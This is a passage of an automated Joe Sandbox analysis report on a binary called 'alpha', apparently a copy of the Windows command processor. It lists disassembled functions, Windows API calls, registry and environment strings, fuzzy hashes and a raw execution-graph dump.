                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcschr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                        • Part of subcall function 00007FF79374EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F000
                                                                                        • Part of subcall function 00007FF79374EF40: wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F031
                                                                                        • Part of subcall function 00007FF79374EF40: iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      • longjmp.MSVCRT ref: 00007FF79375CCBC
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375CCE0
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: memmovewcsncmp
                                                                                      • String ID: 0123456789
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7937697D0
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7937698D7
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                      • String ID: Software\Classes
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A0FC
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A1FB
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                      • String ID: Software\Classes
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ConsoleTitle
                                                                                      • String ID: -
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpswscanf
                                                                                      • String ID: :EOF
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp
                                                                                      • String ID: /-Y
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3$3
                                                                                      • API String ID: 0-2538865259
                                                                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                      • Instruction ID: 9dc80985a065e34141df25e1f924d7897ce801a02ebdf7e79c9789b1bf148745
                                                                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                      • Instruction Fuzzy Hash: 7C015B31D0A1428AF7F4BB70A8C8274F6B9BF5C321FD50135C44E215A1CF2C38958672
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                      • Instruction ID: f0f40249d2e67cbd2a680be8f2a71dc3394fdc690c79a20915f94f55ab6bd68f
                                                                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                      • Instruction Fuzzy Hash: 7B415E71A0964286FAA8AF34E4C4179BBE8FF49B40B948539C64E13750DF3CE544CB60

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.7%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:780
                                                                                      Total number of Limit Nodes:21
19333->19335 19336 7ff79376447b longjmp 19333->19336 19339 7ff793764639 19333->19339 19367 7ff79376475e 19333->19367 19392 7ff793747348 19334->19392 19338 7ff793747348 168 API calls 19335->19338 19340 7ff793764492 19336->19340 19390 7ff793764524 19338->19390 19344 7ff793764695 19339->19344 19359 7ff79376463e 19339->19359 19345 7ff793747348 168 API calls 19340->19345 19342->19334 19342->19340 19348 7ff793764475 19342->19348 19346 7ff793747348 168 API calls 19343->19346 19353 7ff7937473d4 168 API calls 19344->19353 19360 7ff7937644a8 19345->19360 19376 7ff793764549 19346->19376 19347 7ff793747315 19407 7ff7937473d4 19347->19407 19348->19336 19348->19344 19349 7ff793747348 168 API calls 19349->19335 19350 7ff793747348 168 API calls 19350->19347 19351 7ff7937472b0 168 API calls 19355 7ff79376480e 19351->19355 19369 7ff79376469a 19353->19369 19354 7ff7937645b2 19357 7ff793747348 168 API calls 19354->19357 19355->18889 19356 7ff793747323 19356->18889 19364 7ff7937645c7 19357->19364 19358 7ff793764654 19366 7ff793747348 168 API calls 19358->19366 19359->19336 19359->19358 19365 7ff7937644e2 19360->19365 19372 7ff793747348 168 API calls 19360->19372 19361 7ff79376455e 19361->19354 19370 7ff793747348 168 API calls 19361->19370 19362 7ff7937646e1 19363 7ff7937472b0 168 API calls 19362->19363 19368 7ff793764738 19363->19368 19371 7ff793747348 168 API calls 19364->19371 19373 7ff7937472b0 168 API calls 19365->19373 19366->19356 19367->19349 19374 7ff793747348 168 API calls 19368->19374 19369->19362 19381 7ff7937646c7 19369->19381 19382 7ff7937646ea 19369->19382 19370->19354 19375 7ff7937645db 19371->19375 19372->19365 19377 7ff7937644f1 19373->19377 19374->19390 19379 7ff793747348 168 API calls 19375->19379 19376->19354 19376->19361 19378 7ff793747348 168 API calls 19376->19378 19380 7ff7937472b0 168 API calls 19377->19380 19378->19361 19383 7ff7937645ec 19379->19383 19384 7ff793764503 19380->19384 19381->19362 19388 7ff793747348 168 API calls 19381->19388 19385 7ff793747348 
168 API calls 19382->19385 19386 7ff793747348 168 API calls 19383->19386 19384->19356 19387 7ff793747348 168 API calls 19384->19387 19385->19362 19389 7ff793764600 19386->19389 19387->19390 19388->19362 19391 7ff793747348 168 API calls 19389->19391 19390->19351 19390->19356 19391->19390 19398 7ff79374735d 19392->19398 19393 7ff793743278 166 API calls 19394 7ff793764820 longjmp 19393->19394 19395 7ff793764838 19394->19395 19396 7ff793743278 166 API calls 19395->19396 19397 7ff793764844 longjmp 19396->19397 19399 7ff79376485a 19397->19399 19398->19393 19398->19395 19406 7ff7937473ab 19398->19406 19400 7ff793747348 166 API calls 19399->19400 19401 7ff79376487b 19400->19401 19402 7ff793747348 166 API calls 19401->19402 19403 7ff7937648ad 19402->19403 19404 7ff793747348 166 API calls 19403->19404 19405 7ff7937472ff 19404->19405 19405->19347 19405->19350 19408 7ff79376485a 19407->19408 19409 7ff793747401 19407->19409 19410 7ff793747348 168 API calls 19408->19410 19409->19356 19411 7ff79376487b 19410->19411 19412 7ff793747348 168 API calls 19411->19412 19413 7ff7937648ad 19412->19413 19414 7ff793747348 168 API calls 19413->19414 19415 7ff7937648be 19414->19415 19415->19356 16786 7ff793758d80 16787 7ff793758da4 16786->16787 16788 7ff793758db6 16787->16788 16789 7ff793758dbf Sleep 16787->16789 16790 7ff793758ddb _amsg_exit 16788->16790 16793 7ff793758de7 16788->16793 16789->16787 16790->16793 16791 7ff793758e56 _initterm 16795 7ff793758e73 _IsNonwritableInCurrentImage 16791->16795 16792 7ff793758e3c 16793->16791 16793->16792 16793->16795 16800 7ff7937537d8 GetCurrentThreadId OpenThread 16795->16800 16833 7ff7937504f4 16800->16833 16802 7ff793753839 HeapSetInformation RegOpenKeyExW 16803 7ff79375388d 16802->16803 16804 7ff79375e9f8 RegQueryValueExW RegCloseKey 16802->16804 16805 7ff793755920 VirtualQuery VirtualQuery 16803->16805 16807 7ff79375ea41 GetThreadLocale 16804->16807 16806 7ff7937538ab GetConsoleOutputCP GetCPInfo 16805->16806 16806->16807 16808 7ff7937538f1 memset 
16806->16808 16810 7ff793753919 16807->16810 16808->16810 16809 7ff793754d5c 391 API calls 16809->16810 16810->16804 16810->16809 16811 7ff79375eb27 _setjmp 16810->16811 16812 7ff793753948 _setjmp 16810->16812 16813 7ff793768530 370 API calls 16810->16813 16814 7ff793743240 166 API calls 16810->16814 16815 7ff7937501b8 6 API calls 16810->16815 16816 7ff793754c1c 166 API calls 16810->16816 16817 7ff79374df60 481 API calls 16810->16817 16818 7ff79375eb71 _setmode 16810->16818 16819 7ff7937586f0 182 API calls 16810->16819 16820 7ff793750580 12 API calls 16810->16820 16823 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16823 16824 7ff79374be00 647 API calls 16810->16824 16825 7ff7937558e4 EnterCriticalSection LeaveCriticalSection 16810->16825 16811->16810 16812->16810 16813->16810 16814->16810 16815->16810 16816->16810 16817->16810 16818->16810 16819->16810 16821 7ff79375398b GetConsoleOutputCP GetCPInfo 16820->16821 16822 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16821->16822 16822->16810 16823->16810 16824->16810 16826 7ff79375ebbe GetConsoleOutputCP GetCPInfo 16825->16826 16827 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16826->16827 16828 7ff79375ebe6 16827->16828 16829 7ff79374be00 647 API calls 16828->16829 16830 7ff793750580 12 API calls 16828->16830 16829->16828 16831 7ff79375ebfc GetConsoleOutputCP GetCPInfo 16830->16831 16832 7ff7937504f4 GetModuleHandleW GetProcAddress SetThreadLocale 16831->16832 16832->16810 16834 7ff793750504 16833->16834 16835 7ff79375051e GetModuleHandleW 16834->16835 16836 7ff79375054d GetProcAddress 16834->16836 16837 7ff79375056c SetThreadLocale 16834->16837 16835->16834 16836->16834
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                      • API String ID: 3305344409-4288247545
                                                                                      • Opcode ID: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction ID: 4407d8c19104c09594780358b436445b67f96e7267e9bee31977e3d803b385cd
                                                                                      • Opcode Fuzzy Hash: 70fe977c148540083158fa9cabe6887d804174c165fa23e72430d09dac556fef
                                                                                      • Instruction Fuzzy Hash: 5C42C521A0868285FFF8BB3198D42B9A7A8EF8D795F844136D91E677D4DF3CE5448320

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                      • String ID: :$:$:$:ON$OFF
                                                                                      • API String ID: 972821348-467788257
                                                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction ID: 5baea29ec09c63552ddf53e1c55b9fdae56214dad418049467c2a7cb0a0fd6f3
                                                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                      • Instruction Fuzzy Hash: A3229321A0864286FBF8BF3594D4279E6DAEF5DB81FC88136C90E67394DE3CB5408671

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                      • API String ID: 1351325837-2236139042
                                                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction ID: e0b5a3593ae4b09b2ad2ad2e652c9219d7e4c6ef6faf26e3d431666c5e2da33e
                                                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                      • Instruction Fuzzy Hash: 33F13B61B04742C5EBB5AF21D5902B9A2A8FF0CB91FD44536CA0E677A4EF3CE506C360

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                      • API String ID: 388421343-2905461000
                                                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction ID: 36eef53106bbb2fae4f4d88116937c35fa51eaed6ff1f9c23c6529cd3fa427eb
                                                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                      • Instruction Fuzzy Hash: C5F13132A0D78295EAB4AB21E4C47BAF7A8FB8D741F804136D94D62754DF3CE445CB60

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                      • API String ID: 145004033-3846321370
                                                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction ID: f1e56129956c445456494d9acf5baf7c64b1fbbc8c684472000762b9549fe907
                                                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                      • Instruction Fuzzy Hash: 6FE1713261DA82C6E7B0AB20E48057AF7A8FB8C755F805536E68F52B54DF7CE544CB20

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                      • API String ID: 2624720099-1920437939
                                                                                      • Opcode ID: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction ID: aa689dcef4715ea118d2ce4aa4cc1af3415a4e338a07633f27a695ea0dd10008
                                                                                      • Opcode Fuzzy Hash: bc784ebed84259970a51cd510c23a28617bcb94ad13cc89061c4f660481954aa
                                                                                      • Instruction Fuzzy Hash: 4BC1AF31E086428AF7B8BB7094C02B8FAA9FF4D755F84413AD90E667A1DF3CA4418770

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 873889042-0
                                                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction ID: 5cb93b0c815139a14eb5a2b2fbb0c5163f8c1f1c3d10c3d8db14a94202199cc4
                                                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                      • Instruction Fuzzy Hash: 00515231609B4296E7A4AF25E4C4179FBA8FB5DB91F848131CA1E63350CF3CE9548B60

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                      • Instruction ID: 137b81312464587e912c7fe46cf54c87c312066157ef4a3f296ecb72c3305a52
                                                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                      • Instruction Fuzzy Hash: 28511821F0868285EAB4AF2595C42BAE694FB5CBA0FC45236DE6E677D0DF3CE441C710

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754D9A
                                                                                        • Part of subcall function 00007FF7937558E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF79376C6DB), ref: 00007FF7937558EF
                                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DBB
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DCA
                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DE0
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DEE
